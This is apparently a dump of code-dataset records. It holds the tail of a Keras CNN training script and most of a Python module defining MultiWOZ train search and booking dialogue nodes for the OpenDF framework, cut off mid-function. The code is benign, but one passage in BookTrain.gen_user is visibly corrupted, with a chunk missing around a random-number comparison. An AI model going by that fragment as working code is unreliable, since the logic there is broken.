self.hyperparams_handler.modify_hyperparams()\n\n def _get_cv_score(self, images, labels, class_weight):\n cv = CrossValidator(4, self.hyperparams_handler.current)\n scores = cv.run(images, labels, class_weight)\n return np.mean([score[1] for score in scores])\n\n\n def _save_best(self, new_best_cv_score):\n self.best_cv_score = new_best_cv_score\n self.hyperparams_handler.save_best()\n\n\nif __name__ == '__main__':\n images, labels = load_data('train_sample.pkl')\n images = images.reshape(-1, 56, 56, 1)\n class_weight = calculate_class_weight(labels)\n labels = to_categorical(labels, num_classes=36)\n\n images_tst, labels_tst = load_data('test_sample.pkl')\n images_tst = images_tst.reshape(-1, 56, 56, 1)\n labels_tst = to_categorical(labels_tst, num_classes=36)\n\n initial_hyperparams = dict()\n initial_hyperparams['filters_1'] = HP_SPACE['filters_1'][1]\n initial_hyperparams['filters_2'] = HP_SPACE['filters_2'][2]\n initial_hyperparams['pooling_1'] = HP_SPACE['pooling_1'][0]\n initial_hyperparams['pooling_2'] = HP_SPACE['pooling_2'][2]\n initial_hyperparams['kernel_1'] = HP_SPACE['kernel_1'][1]\n initial_hyperparams['kernel_2'] = HP_SPACE['kernel_2'][2]\n initial_hyperparams['beta_1'] = HP_SPACE['beta_1'][0]\n initial_hyperparams['beta_2'] = HP_SPACE['beta_2'][1]\n initial_hyperparams['eps'] = HP_SPACE['eps'][1]\n initial_hyperparams['learning_rate'] = HP_SPACE['learning_rate'][1]\n initial_hyperparams['rho'] = HP_SPACE['rho'][0]\n initial_hyperparams['decay'] = HP_SPACE['decay'][2]\n initial_hyperparams['hidden_units'] = HP_SPACE['hidden_units'][2]\n initial_hyperparams['activation'] = HP_SPACE['activation'][1]\n\n initial_hyperparams['use_adam'] = HP_SPACE['use_adam'][0]\n initial_hyperparams['use_dropout'] = HP_SPACE['use_dropout'][1]\n initial_hyperparams['use_class_weight'] = HP_SPACE['use_class_weight'][0]\n initial_hyperparams['use_lr_reduction'] = HP_SPACE['use_lr_reduction'][0]\n initial_hyperparams['use_img_augmentation'] = HP_SPACE['use_img_augmentation'][1]\n\n # classifier_optimizer = ClassifierOptimizer(initial_hyperparams)\n # classifier_optimizer.run_optimization(50, images, labels, class_weight)\n\n classifier_trainer = ClassifierTrainer(initial_hyperparams)\n classifier_trainer.build_classifier()\n classifier_trainer.compile_classifier()\n classifier_trainer.fit_classifier(images, labels, images_tst, labels_tst, epochs=20, class_weight=class_weight)\n # classifier = train_classifier(images, labels, images_tst, labels_tst, initial_hyperparams, class_weight, epochs=10)\n classifier_trainer.classifier.save('keras_cnn_model_2.h5')","repo_name":"hubert-jaworski/amRecruitmentTask","sub_path":"keras_cnn.py","file_name":"keras_cnn.py","file_ext":"py","file_size_in_byte":11325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"1555704859","text":"from opendf.applications.multiwoz_2_2.nodes.multiwoz import *\nfrom opendf.applications.multiwoz_2_2.utils import *\nfrom opendf.graph.nodes.framework_functions import revise, duplicate_subgraph\nfrom opendf.utils.utils import Message\n\nif use_database:\n multiwoz_db = MultiWozSqlDB.get_instance()\nelse:\n multiwoz_db = MultiWOZDB.get_instance()\nnode_fact = NodeFactory.get_instance()\nenvironment_definitions = EnvironmentDefinition.get_instance()\n\n\nmap_train_slots = {\n \"train-departure\": \"departure=%s\" if EXTRACT_SIMP else \"departure=LIKE(Location(%s))\",\n \"train-destination\": \"destination=%s\" if EXTRACT_SIMP else \"destination=LIKE(Location(%s))\",\n \"train-duration\": \"duration=%s\" if EXTRACT_SIMP else \"duration=LIKE(Duration({escape_string(value)}))\",\n \"train-day\": \"day=%s\",\n \"train-arriveby\": \"arriveby=%s\" if EXTRACT_SIMP else \"arriveby=ArriveBy(%s)\",\n \"train-leaveat\": \"leaveat=%s\" if EXTRACT_SIMP else \"leaveat=LeaveAt(%s)\",\n \"train-price\": \"price=%s\",\n \"train-bookpeople\": \"bookpeople=%s\",\n \"train-booktime\": \"booktime=%s\",\n}\n\nmap_train_inputs = {\n \"departure\": 'leaving from %s',\n \"destination\": 'going to %s',\n \"duration\": 'taking %s',\n \"day\": 'on %s',\n \"arriveby\": 'arriving at %s',\n \"leaveat\": 'leaving at %s',\n \"price\": 'costing %s',\n \"bookpeople\": 'for %s people',\n \"booktime\": 'on %s',\n 'trainid': 'with train id %s',\n}\n\n\nclass Train(MultiWOZDomain):\n def __init__(self, typ=None):\n typ = typ if typ else type(self)\n super().__init__(typ)\n self.signature.add_sig('departure', Location)\n self.signature.add_sig('destination', Location)\n self.signature.add_sig('leaveat', MWOZTime)\n self.signature.add_sig('arriveby', MWOZTime)\n self.signature.add_sig('day', Book_day) # changed from Str - easier to reuse value for hotel, restaurant\n # the fields below come from the system\n self.signature.add_sig('duration', Duration)\n self.signature.add_sig('price', Float)\n self.signature.add_sig('trainid', TrainID)\n\n @staticmethod\n def gen_get_field_str_format(name, prms=None):\n return gen_get_field_str_format(name, map_train_inputs)\n\n @staticmethod\n def gen_show_options():\n return ['departure', 'destination', 'leaveat', 'arriveby', 'trainid']\n\n @staticmethod\n def gen_get_alternative_values(name, prms=None):\n if name=='departure':\n return ['london', 'manchester', 'oxford']\n if name=='destination':\n return ['london', 'manchester', 'oxford']\n if name=='leaveat':\n return ['10:00', '11:00', '12:00']\n if name=='arriveby':\n return ['10:00', '11:00', '12:00']\n if name=='day':\n return ['sunday', 'monday', 'tuesday', 'wednesday', 'thursday']\n return []\n\n def get_context_values(self, inform_values=None, req_fields=None):\n slot_values = {}\n for name in self.inputs:\n element = []\n if name in {'arriveby', 'leaveat'}:\n node = next(filter(lambda x: x.typename() in {\"Time\", \"MWOZTime\"}, self.input_view(name).topological_order()), None)\n if isinstance(node, Time):\n p_time = node.to_Ptime()\n element.append(f\"{p_time.hour:02d}:{p_time.minute:02d}\")\n elif isinstance(node, MWOZTime):\n time_str = node.get_dat(posname(1)).split()[-1]\n match = TIME_REGEX.match(time_str)\n if match is None:\n hour, minute = 0, 0 # problem\n else:\n hour, minute = match.groups()\n element.append(f\"{int(hour) % 24:02d}:{int(minute) % 60:02d}\")\n else:\n node = next(filter(lambda x: x.typename() == \"Str\", self.input_view(name).topological_order()), None)\n if node:\n element.append(node.dat)\n slot_values[f'train-{name.lower()}'] = element\n\n return slot_values\n\n def generate_sql_select(self):\n return select(MultiWozSqlDB.TRAIN_TABLE)\n\n def generate_sql_where(self, selection, parent_id, **kwargs):\n if 'arriveby' in self.inputs:\n selection = self.input_view(\"arriveby\").generate_sql_where(\n selection, MultiWozSqlDB.TRAIN_TABLE.columns.arriveby, **kwargs)\n\n if 'day' in self.inputs:\n selection = self.input_view(\"day\").generate_sql_where(\n selection, MultiWozSqlDB.TRAIN_TABLE.columns.day, **kwargs)\n\n if 'departure' in self.inputs:\n selection = self.input_view(\"departure\").generate_sql_where(\n selection, MultiWozSqlDB.TRAIN_TABLE.columns.departure, **kwargs)\n\n if 'destination' in self.inputs:\n selection = self.input_view(\"destination\").generate_sql_where(\n selection, MultiWozSqlDB.TRAIN_TABLE.columns.destination, **kwargs)\n\n if 'duration' in self.inputs:\n selection = self.input_view(\"duration\").generate_sql_where(\n selection, MultiWozSqlDB.TRAIN_TABLE.columns.duration, **kwargs)\n\n if 'leaveat' in self.inputs:\n selection = self.input_view(\"leaveat\").generate_sql_where(\n selection, MultiWozSqlDB.TRAIN_TABLE.columns.leaveat, **kwargs)\n\n if 'price' in self.inputs:\n selection = self.input_view(\"price\").generate_sql_where(\n selection, MultiWozSqlDB.TRAIN_TABLE.columns.price, **kwargs)\n\n if 'trainid' in self.inputs:\n selection = self.input_view(\"trainid\").generate_sql_where(\n selection, MultiWozSqlDB.TRAIN_TABLE.columns.trainid, **kwargs)\n\n return selection\n\n def graph_from_row(self, row, context):\n params = []\n for field in self.signature.keys():\n value = row[field]\n if value and field in ['leaveat', 'arriveby']:\n s = str(value).split()[1].split(':')\n value = ':'.join(s[:2])\n if value:\n if isinstance(value, str):\n value = escape_string(value)\n params.append(f\"{field}={value}\")\n\n node_str = f\"Train({', '.join(params)})\"\n g, _ = Node.call_construct_eval(node_str, context, constr_tag=NODE_COLOR_DB)\n g.tags[DB_NODE_TAG] = 0\n return g\n\n # def describe(self, params=None):\n # prms = []\n # dep, dest, leave, arr, day, dur, price, tid = \\\n # self.get_dats(['departure', 'destination', 'leaveat', 'arriveby', 'day', 'duration', 'price', 'trainid'])\n # prms.append(tid if tid else 'the train')\n # if dep:\n # prms.append('from %s' % dep)\n # if dest:\n # prms.append('to %s' % dest)\n # if day:\n # prms.append('on %s' % day)\n # if leave:\n # prms.append('leaves at %s' % leave)\n # if arr:\n # prms.append('arrives at %s' % arr)\n # if price:\n # prms.append('costs %s' % price)\n # return Message(', '.join(prms), objects=[self])\n\n def describe(self, params=None):\n prms = []\n tid = self.get_dats(['trainid'])\n prms.append(tid if tid else 'the train')\n for i in ['departure', 'destination', 'day', 'leaveat', 'arriveby', 'price']:\n dt = self.get_dat(i)\n if dt:\n prms.append(map_train_inputs[i] % dt)\n return Message(', '.join(prms), objects=[self])\n\n def getattr_yield_msg(self, attr, val=None, plural=None, params=None):\n return self.describe(params=params)\n\n def collect_state(self):\n do_collect_state(self, 'train')\n\n def gen_field_opts(self, node_name, prms=None):\n opts = []\n add_field_opt(opts, self, 'departure', 0)\n add_field_opt(opts, self, 'destination', 0)\n add_field_opt(opts, self, 'day', 0)\n add_field_opt(opts, self, 'leaveat', 0)\n add_field_opt(opts, self, 'arriveby', 0)\n if True or prms and 'full' in prms:\n add_field_opt(opts, self, 'price', -0.2)\n add_field_opt(opts, self, 'trainid', -0.2)\n add_field_opt(opts, self, 'duration', -0.2)\n return opts\n\n # replace slot value with a random (but valid) value for the given opt\n @staticmethod\n def get_alternative_opt_value(opt):\n slot, txt = opt\n if '=' in slot:\n slot = slot.split('=')[0]\n vals = Train.gen_get_alternative_values(slot)\n if vals:\n val = random.choice(vals)\n return '%s=%s' % (slot, val), Train.gen_get_field_str_format(slot) % val\n return opt\n\n###################################################################\n\n\nclass TrainBookInfo(Node):\n def __init__(self):\n super().__init__(type(self))\n self.signature.add_sig('bookpeople', Book_people)\n\n @staticmethod\n def gen_get_field_str_format(name, prms=None):\n if name=='bookpeople':\n return 'for %s people'\n return ''\n\n @staticmethod\n def gen_show_options():\n return ['bookpeople']\n\n @staticmethod\n def gen_get_alternative_values(name, prms=None):\n if name=='bookpeople':\n return ['1', '2', '3', '4']\n return []\n\n def get_context_values(self, inform_values=None, req_fields=None):\n slot_values = {}\n for name in self.inputs:\n element = next(filter(lambda x: x.typename() == \"Str\", self.input_view(name).topological_order()), None)\n #name = 'book' + name[5:] if name.startswith('book_') else name\n slot_values[f'train-{name}'] = [element.dat] if element else []\n if inform_values:\n for k in inform_values:\n slot_values['train-'+k] = inform_values[k]\n return slot_values\n\n def collect_state(self):\n do_collect_state(self, 'train', 'book')\n\n\n def gen_field_opts(self, node_name, prms=None):\n opts = []\n add_field_opt(opts, self, 'bookpeople', 0)\n return opts\n\n # replace slot value with a random (but valid) value for the given opt\n @staticmethod\n def get_alternative_opt_value(opt):\n slot, txt = opt\n if '=' in slot:\n slot = slot.split('=')[0]\n vals = TrainBookInfo.gen_get_alternative_values(slot)\n if vals:\n val = random.choice(vals)\n # return '%s=%s' % (slot, val), TrainBookInfo.gen_get_field_str_format(slot) % val\n return '%s=%s' % (slot, val), gen_get_field_str_format(slot, map_train_inputs) % val\n return opt\n\n\nclass BookTrainConfirmation(Node):\n def __init__(self):\n super().__init__(type(self))\n self.signature.add_sig('train', Train)\n self.signature.add_sig('book_info', TrainBookInfo)\n self.signature.add_sig('conf_code', Str)\n\n def describe(self, params=None):\n s = ['Train resevation: ']\n m1 = self.input_view('train').describe(params=['compact'])\n m2 = self.input_view('book_info').describe()\n s.append(m1.text)\n s.append(m2.text)\n s.append('Confirmation code: ' + self.get_dat('conf_code'))\n return Message(' NL '.join(s), objects=m1.objects+m2.objects)\n\n def collect_state(self):\n self.inputs['train'].collect_state()\n self.inputs['book_info'].collect_state()\n do_collect_state(self, 'train', 'book') # add conf code directly\n\n\ndef check_train_availability(train, binf, book_fields):\n if environment_definitions.agent_oracle:\n if 'ref' in book_fields:\n return True, book_fields['ref']\n if 'nobook' in book_fields:\n return False, None\n return True, 'XYZ%12345' # % random.randint(1000000, 9000000)\n\n\nclass BookTrain(Node):\n def __init__(self):\n super().__init__(BookTrainConfirmation)\n self.signature.add_sig('train', Train)\n self.signature.add_sig('book_info', TrainBookInfo)\n # maybe wrap the book info inputs into a node?\n self.inc_count('max_inform_tid', 1)\n\n # todo - add agent_oracle mode!\n def exec(self, all_nodes=None, goals=None):\n #self.update_mwoz_state()\n\n if 'train' not in self.inputs:\n raise MissingValueException('train', self, 'Please specify which train you are looking for')\n train = self.input_view('train')\n context = self.context\n\n # maybe: in case of failed booking, then inform what needs to change? todo\n fields = ['bookpeople', 'ref']\n inform_fields = {}\n req_fields = {}\n book_fields = {}\n if environment_definitions.agent_oracle:\n dact = context.agent_turn['dialog_act']['dialog_act']\n atext = context.agent_turn['utterance']\n # 1. try to understand what the agent did -\n for d in dact:\n dom, typ = d.split('-')\n if dom=='xxBooking':\n pass # todo\n elif dom=='Train' or dom=='Booking':\n if typ == 'Inform':\n for [k, v] in dact[d]:\n if k in fields:\n inform_fields[k] = v\n if typ in ['Book', 'OfferBooked']:\n for [k, v] in dact[d]:\n if k in fields:\n book_fields[k] = v\n if typ == 'NoBook':\n book_fields['nobook'] = 'True'\n if typ == 'Request':\n for [k, v] in dact[d]:\n if k in fields:\n req_fields[k] = v\n\n if environment_definitions.oracle_only:\n # return the original message of the agent,\n #self.update_mwoz_state(inform_fields, req_fields)\n raise OracleException(atext, self)\n\n msg = ''\n if self.count_ok('inform_tid'):\n self.inc_count('inform_tid')\n msg = 'OK, ' + train.describe().text + '. NL '\n if 'book_info' not in self.inputs: # should not be the case when using the \"normal\" initialization (fallback search)\n d, e = self.call_construct('TrainBookInfo()', self.context)\n d.connect_in_out('book_info', self)\n binf = self.inputs['book_info']\n if 'bookpeople' not in binf.inputs:\n raise MissingValueException('bookpeople', self, msg+'For how many people?')\n # if 'bookday' not in binf.inputs:\n # raise MissingValueException(msg+'On which day?', self)\n ok, conf_code = check_train_availability(train, binf, book_fields)\n #self.update_mwoz_state(inform_fields, req_fields)\n if ok:\n d, e = self.call_construct_eval('BookTrainConfirmation(train=%s, book_info=%s, conf_code=%s)' %\n (id_sexp(train), id_sexp(binf), conf_code), self.context)\n self.set_result(d)\n self.context.add_message(self, 'I have made the reservation as requested. confirmation ref %s' % conf_code)\n else:\n # todo - if oracle - say what failed / what is needed\n raise InvalidInputException('Unfortunately the train can not confirm this booking. NL Maybe try another day or length of stay?', self)\n\n def collect_state(self):\n if self.result != self:\n self.res.collect_state()\n else:\n self.inputs['train'].collect_state()\n self.inputs['book_info'].collect_state()\n\n def get_opts(self):\n opts = []\n for i in ['train', 'book_info']:\n if i in self.inputs:\n opts += self.input_view(i).gen_field_opts('BookTrain')\n return opts\n\n def add_slot_noise(self, opts, noise=0):\n if noise>0:\n opts = [o if random.random() > noise else\n TrainBookInfo.get_alternative_opt_value(Train.get_alternative_opt_value(o)) for o in opts]\n return opts\n\n def gen_user(self, target, context, node_map, persona, tried=None):\n # using the convention:\n # if calling for the first time (before the current BookTrain even exists), then\n # self is actually target, and target is given as None\n tried = tried if tried else []\n curr_exists = target is not None\n targ = target if curr_exists else self\n ctx = self.context\n if EXTRACT_SIMP:\n rest = self.input_view('train')\n # 1. we may ask a question about the train\n if curr_exists and (random.random()3:\n x=1\n if len(sel_opts)>0:\n txt += ', '.join([j for (i,j) in sel_opts])\n return pexp, txt, None, False\n return '', '', None, False\n\n # base function - generate text of user request for input inp given target node\n def gen_user_text(self, target, inp):\n # should always be customized!\n v = target.input_view(inp)\n if v:\n return 'I want %s to be %s' % (inp, v.describe().text)\n return 'grrr...'\n\n def compare_task(self, other):\n crest, cbook = self.get_input_views(['train', 'book_info'])\n orest, obook = other.get_input_views(['train', 'book_info'])\n if crest.typename() == 'Train' and cbook.typename() == 'TrainBookInfo':\n if orest.typename() == 'Train' and obook.typename() == 'TrainBookInfo':\n if crest.compare_graphs(orest) and cbook.compare_graphs(obook):\n return True\n return False\n\n\nclass FindTrain(Node):\n def __init__(self):\n super().__init__(Train)\n self.signature.add_sig(posname(1), Train, alias='train')\n\n # arriveby and leaveat actually mean arrive<=T, depart>=T, so even if we already gave\n # a specific time for either, we still get objects with different values for the field!\n def fix_dfields(self, dfields):\n trn = self.input_view('train')\n exc = []\n if trn and trn.typename()=='Train' and trn.constraint_level==1:\n for f in ['leaveat', 'arriveby']:\n if f in trn.inputs:\n exc.append(f)\n return {f:dfields[f] for f in dfields if f not in exc}\n\n def exec(self, all_nodes=None, goals=None):\n context = self.context\n if posname(1) in self.inputs:\n train = self.inputs[posname(1)]\n else:\n train, _ = self.call_construct('Train?()', context)\n train.connect_in_out(posname(1), self)\n\n results = results0 = multiwoz_db.find_elements_that_match(train, train.context)\n nresults = nresults0 = len(results)\n\n # update_mwoz_state(train, context) # initial state from last turn / prev pexp in this turn\n self.filter_and_set_result(results) # initially set result to single result, if single, or don't\n\n inform_fields = defaultdict(list)\n req_fields = {}\n rec_field = None\n sugg = None\n objs = None\n if environment_definitions.agent_oracle:\n dact = context.agent_turn['dialog_act']['dialog_act']\n atext = context.agent_turn['utterance']\n # 1. try to understand what the agent did -\n for d in dact:\n dom, typ = d.split('-')\n if dom=='Booking':\n if typ=='Book':\n for [k, v] in dact[d]:\n if k=='name':\n inform_fields['book_name'].append(v)\n elif dom=='Train':\n if typ in ['Inform']:\n for [k, v] in dact[d]:\n inform_fields[k].append(v)\n if typ == 'Request':\n for [k, v] in dact[d]:\n req_fields[k] = v\n\n # for train - recommending by time - either leave or arrive\n if nresults>1:\n for i in ['trainid', 'leaveat', 'arriveby']:\n if not rec_field and i in inform_fields and len(to_list(inform_fields[i]))==1:\n rec_field = i\n\n # TODO - if accepting recommendation from agent for leave/arrive time, the it means that EXACT time,\n # not like the input from user, which is interpreted as LE / GE !\n if rec_field:\n v = inform_fields[rec_field][0]\n r = self.filter_and_set_result(results, rec_field, v, inform_fields)\n if r:\n results = r\n nresults = len(results)\n # results should not be empty - unless the agent made a mistake\n sugg = self.mod_train_field_and_suggest_neg(train, rec_field, v, inform_fields)\n #update_mwoz_state(train, context, inform_fields, req_fields)\n\n if environment_definitions.oracle_only:\n # return the original message of the agent,\n # but may need to change the result according to the agent's action\n #update_mwoz_state(train, context, inform_fields, req_fields)\n raise OracleException(atext, self, suggestions=sugg, objects=objs)\n\n if not environment_definitions.agent_oracle:\n # todo - add logic to recommend first/last train (depending on user request specifying leave or arrive)\n if nresults > 1 and not rec_field:\n dfields = get_diff_fields(results0, ignore_fields=['price']) # 'departure', 'destination', 'leaveat', 'arriveby', 'day'])\n dfields = self.fix_dfields(dfields)\n if len(dfields)>0:\n for f in list(dfields.keys())[:2]:\n req_fields[f] = '?'\n\n org_inform_fields = {i:inform_fields[i] for i in inform_fields}\n if len(inform_fields)>0 or len(req_fields)>0:\n if rec_field and not sugg:\n v = inform_fields[rec_field][0]\n r = self.filter_and_set_result(results, rec_field, v, org_inform_fields)\n results = r if r else results\n nresults = len(results)\n sugg = self.mod_train_field_and_suggest_neg(train, rec_field, v, org_inform_fields)\n\n for f in ['departure', 'destination', 'leaveat', 'arriveby', 'day', 'duration', 'price', 'trainid']:\n if f in inform_fields:\n inform_fields[f] = collect_values(results0, f)\n\n if not rec_field or req_fields:\n if len(req_fields)==0 and not environment_definitions.agent_oracle and nresults>2:\n dfields = get_diff_fields(results, ignore_fields=['departure', 'destination', 'leaveat', 'arriveby', 'day'])\n if dfields:\n req_fields = {i:'?' for i in list(dfields.keys())[:2]}\n\n msg, objs = self.describe_inform_request(nresults0, inform_fields, req_fields, rec_field, org_inform_fields)\n\n #update_mwoz_state(train, context, inform_fields, req_fields) # use inform_fields to update state\n if nresults!=1 or rec_field:\n raise OracleException(msg, self, suggestions=sugg, objects=objs)\n else:\n self.context.add_message(self, msg)\n\n # no inform fields\n #update_mwoz_state(train, context) # update without inform fields\n if nresults == 0:\n raise ElementNotFoundException(\n \"I can not find a matching train in the database. Maybe another area or price range?\", self)\n if nresults > 1:\n objs = list(inform_fields.keys())[:2]\n diffs = ' or '.join(objs)\n if diffs:\n msg = 'Multiple (%d) matches found. Maybe select %s?' % (nresults, diffs)\n else:\n msg = 'Multiple (%d) matches found. Can you be more specific?' % nresults\n raise MultipleEntriesSingletonException(msg, self, suggestions=sugg, objects=objs)\n\n # if nresults==1 : success, do nothing\n\n def fallback_search(self, parent, all_nodes=None, goals=None, do_eval=True, params=None):\n top = [g for g in self.context.goals if g.typename()=='MwozConversation']\n if not top:\n top, _ = self.call_construct('MwozConversation()', self.context)\n self.context.add_goal(top)\n else:\n top = top[-1]\n s = '' if posname(1) in self.inputs else 'Train?()'\n d, e = self.call_construct('BookTrain(train=FindTrain(%s), book_info=TrainBookInfo())' % s, self.context)\n if posname(1) in self.inputs:\n find = d.inputs['train']\n self.inputs[posname(1)].connect_in_out(posname(1), find)\n top.add_task(d)\n h = d.inputs['train']\n parent.set_result(h)\n if do_eval:\n e = top.call_eval(add_goal=False)\n if e:\n raise e[0]\n return [h]\n\n # suggest a train with the newly suggested trainid / leaveat / arriveby\n # if reject - restore ALL original values\n def mod_train_field_and_suggest_neg(self, constr, field, v, inform_fields):\n prms = []\n for i in ['trainid', 'leaveat', 'arriveby']:\n if i in inform_fields and len(inform_fields[i]) == 1:\n t = 'TrainID' if i == 'trainid' else 'MWOZTime'\n v = escape_string(inform_fields[i][0])\n old_v = constr.get_dat(i)\n p = '%s=%s(%s)' %(i, t, old_v) if old_v else '%s=Clear()' % t\n prms.append(p)\n d, e = constr.call_construct('%s(%s)' %(t, v), constr.context)\n constr.replace_input(i, d)\n return ['revise(old=Train??(), newMode=overwrite, new=Train?(%s))' % ','.join(prms),\n 'side_task(task=no_op())']\n\n def filter_and_set_result(self, results, field=None, val=None, inform_fields=None):\n if field:\n pp = {}\n rerun_db_search = True\n if rerun_db_search: # we limit the number of results returned from the DB. need to run a search again\n train = self.input_view(posname(1))\n if train:\n pp = {i: id_sexp(train.input_view(i)) for i in train.inputs}\n for i in ['trainid', 'leaveat', 'arriveby']:\n if i in inform_fields and len(inform_fields[i]) == 1:\n t = 'TrainID' if i == 'trainid' else 'MWOZTime'\n v = inform_fields[i][0]\n s = '%s(%s)' % (t, escape_string(v))\n pp[i] = s\n\n prms = ['%s=%s' %(i, pp[i]) for i in pp]\n s = 'Train?(%s)' % ','.join(prms)\n print(s)\n f, _ = self.call_construct(s, self.context)\n if rerun_db_search:\n results = multiwoz_db.find_elements_that_match(f, self.context)\n else:\n results = [r for r in results if f.match(r)]\n # for now, we do a hack for time - this is necessary due to the different meanings of time\n # depending on user/agent (solution - return to explicitly using EQ / LE / GE as before)\n for i in ['leaveat', 'arriveby']:\n if i in inform_fields and len(inform_fields[i]) == 1:\n v = inform_fields[i][0]\n results = [r for r in results if r.get_dat(i)==v]\n if len(results)==1:\n self.set_result(results[0])\n results[0].call_eval(add_goal=False) # not necessary, but adds color\n return results\n\n def describe_inform_request(self, nresults0, inform_fields, req_fields, rec_field, org_inform_fields):\n dep = inform_fields.get('departure')\n dest = inform_fields.get('destination')\n leave = inform_fields.get('leaveat')\n arr = inform_fields.get('arriveby')\n day = inform_fields.get('day')\n dur = inform_fields.get('duration')\n price = inform_fields.get('price')\n tid = inform_fields.get('trainid')\n\n prms = []\n objs = []\n if tid and len(to_list(tid))<3:\n prms.append('I have found ' + and_values_str(tid))\n\n if 'choice' in inform_fields:\n inform_fields['choice'] = [nresults0]\n choice = inform_fields.get('choice')\n if choice:\n prms.append('There are %d matching results' % nresults0)\n elif nresults0 > 1:\n prms.append('I see several (%d) matches' % nresults0)\n\n if dep and len(to_list(dep))<4:\n prms.append('leaving from ' + and_values_str(dep))\n if dest and len(to_list(dest))<4:\n prms.append('going to ' + and_values_str(dest))\n if leave and len(to_list(leave))<3:\n prms.append('leaving at ' + and_values_str(leave))\n if day and len(to_list(day))<3:\n prms.append('on ' + and_values_str(day))\n if arr and len(to_list(arr))<3:\n prms.append('arriving at ' + and_values_str(arr))\n if price and len(to_list(price))<3:\n prms.append('costs ' + and_values_str(price))\n\n if rec_field:\n s = 'I recommend:' + ('' if 'trainid' in org_inform_fields else 'the train ')\n prms.append(s)\n for i in ['trainid', 'leaveat', 'arriveby']:\n if i in org_inform_fields:\n v = org_inform_fields[i][0]\n t = 'leaving at ' if i=='leaveat' else 'arriving at ' if i=='arriveby' else ''\n prms.append('%s%s' % (t,v))\n\n # if 'book_name' in inform_fields:\n # prms.append('I Have booked %s' % inform_fields['book_name'][0])\n if len(req_fields) > 0:\n objs = [i for i in req_fields]\n if nresults0 > 0:\n prms.append('maybe select %s' % ' or '.join(objs))\n else:\n prms.append('Sorry, I can\\'t find a match. Try a different %s' % ' or '.join(objs))\n msg = ', '.join(prms)\n return msg, objs\n\n # if we revise a train constraint which already has a train name with a non-name constraint, then drop the name.\n # e.g. user: \"I want to book train X\", Agent: \"train X is ... and has no parking\". User: \"I want parking\"\n # also if agent made a suggestion (which was implicitly accepted) - since we don't have explicit RejectSuggestion\n # we need this implicit reject\n def on_duplicate(self, dup_tree=False):\n super().on_duplicate(dup_tree=dup_tree)\n # old = self.dup_of.input_view('train')\n old = self.dup_of.res if self.dup_of.res != self.dup_of else self.dup_of.input_view('train')\n curr = self.input_view('train')\n if 'trainid' in old.inputs and 'trainid' in curr.inputs:\n changed = any([old.get_dat(i)!=curr.get_dat(i) and curr.get_dat(i) is not None\n for i in ['departure', 'destination', 'leaveat', 'arriveby', 'day', 'duration']])\n if changed:\n curr.disconnect_input('trainid')\n return self\n\n def collect_state(self):\n if self.result!=self:\n self.res.collect_state()\n elif 'train' in self.inputs:\n self.inputs['train'].collect_state()\n\n def gen_field_opts(self, node_name, prms=None):\n i = self.input_view('train')\n return i.gen_field_opts(node_name, prms) if i else []\n\n\nclass revise_train(revise):\n # make it a subtype of revise, so we don't revise this call\n def __init__(self):\n super().__init__()\n # for the hotel\n self.signature.add_sig('departure', Location)\n self.signature.add_sig('destination', Location)\n self.signature.add_sig('leaveat', MWOZTime)\n self.signature.add_sig('arriveby', MWOZTime)\n self.signature.add_sig('day', Book_day)\n # the fields below come from the system\n self.signature.add_sig('duration', Duration)\n self.signature.add_sig('price', Float)\n self.signature.add_sig('trainid', TrainID)\n # book field\n self.signature.add_sig('bookpeople', Book_people)\n\n def valid_input(self): # override the revise valid_input\n pass\n\n def transform_graph(self, top):\n leave, arrive, dur = self.get_input_views(['leaveat', 'arriveby', 'duration'])\n if leave and leave.typename()=='MWOZTime':\n self.wrap_input('leaveat', 'GE(')\n if arrive and arrive.typename()=='MWOZTime':\n self.wrap_input('arriveby', 'LE(')\n if dur and dur.typename()=='Duration':\n self.wrap_input('duration', 'LIKE(')\n return self, None\n\n def exec(self, all_nodes=None, goals=None):\n # 1. raise or create task\n root = do_raise_task(self, 'FindTrain') # the top conversation\n\n # 2. do revise if requested fields given\n train_fields = ['departure', 'destination', 'leaveat', 'arriveby', 'day', 'duration', 'price', 'trainid']\n book_fields = ['bookpeople']\n fields = {'train': [i for i in self.inputs if i in train_fields],\n 'book': [i for i in self.inputs if i in book_fields]}\n for f in fields:\n if fields[f]:\n nodes = root.topological_order(follow_res=False)\n book = [i for i in nodes if i.typename()=='BookTrain']\n if book: # should always be the case\n book = book[0]\n prms = ['%s=%s' % (i, id_sexp(self.inputs[i])) for i in fields[f]]\n # we know exactly what root/old/new should be, so no need to use the search mechanism of the\n # 'revise' node - instead we can directly call duplicate_subgraph to create the revised graph\n if f=='train':\n old = book.inputs['train'].inputs['train']\n s = 'Train?(' + ','.join(prms) + ')'\n else: # book info\n old = book.inputs['book_info']\n s = 'TrainBookInfo(' + ','.join(prms) + ')'\n new, _ = self.call_construct(s, self.context)\n new_subgraph = duplicate_subgraph(root, old, new, 'overwrite', self)\n root = new_subgraph[-1]\n\n self.set_result(root)\n self.context.add_goal(root) # will not add if already added before\n # root.call_eval() # no need to call eval, since eval_res is True. is this what we want?\n\n\n# use this node is for debugging - replace the \"proactive\" train recommendation by the agent\n# implement recommendation as a suggestion with implicit accept\nclass suggest_train(Node):\n def __init__(self):\n super().__init__()\n self.signature.add_sig(posname(1), Str)\n\n def exec(self, all_nodes=None, goals=None):\n if posname(1) in self.inputs:\n nm = self.get_dat(posname(1))\n suggs = ['no_op()',\n SUGG_IMPL_AGR + 'revise(old=Train??(), newMode=overwrite, new=Train?(trainid=%s))' % nm]\n raise OracleException('How about %s?' % nm, self, suggestions=suggs)\n\n\nclass get_train_info(Node):\n def __init__(self):\n super().__init__()\n self.signature.add_sig('train', Train)\n #self.signature.add_sig('feats', Node)\n self.signature.add_sig(POS, Str)\n\n def transform_graph(self, top):\n pnm, parent = self.get_parent()\n if parent.typename()!='side_task':\n if PERSIST_SIDE:\n parent.wrap_input(pnm, 'side_task(persist=True,task=', do_eval=False)\n else:\n parent.wrap_input(pnm, 'side_task(task=', do_eval=False)\n return parent, None\n return self, None\n\n def exec(self, all_nodes=None, goals=None):\n train = self.input_view('train')\n if not train:\n m = get_refer_match(self.context, all_nodes, goals, pos1='Train?()')\n if m:\n train = m[0]\n else:\n raise MissingValueException('train', self, 'I can give information only after we have selected one train')\n\n if train:\n fts = []\n fts += [self.input_view(i).dat for i in self.inputs if is_pos(i)]\n if fts:\n vals = ['the %s is %s' %(i, train.get_dat(i)) for i in fts]\n msg = 'For %s: ' % train.get_dat('trainid') + ', NL '.join(vals)\n self.context.add_message(self, msg)\n\n def 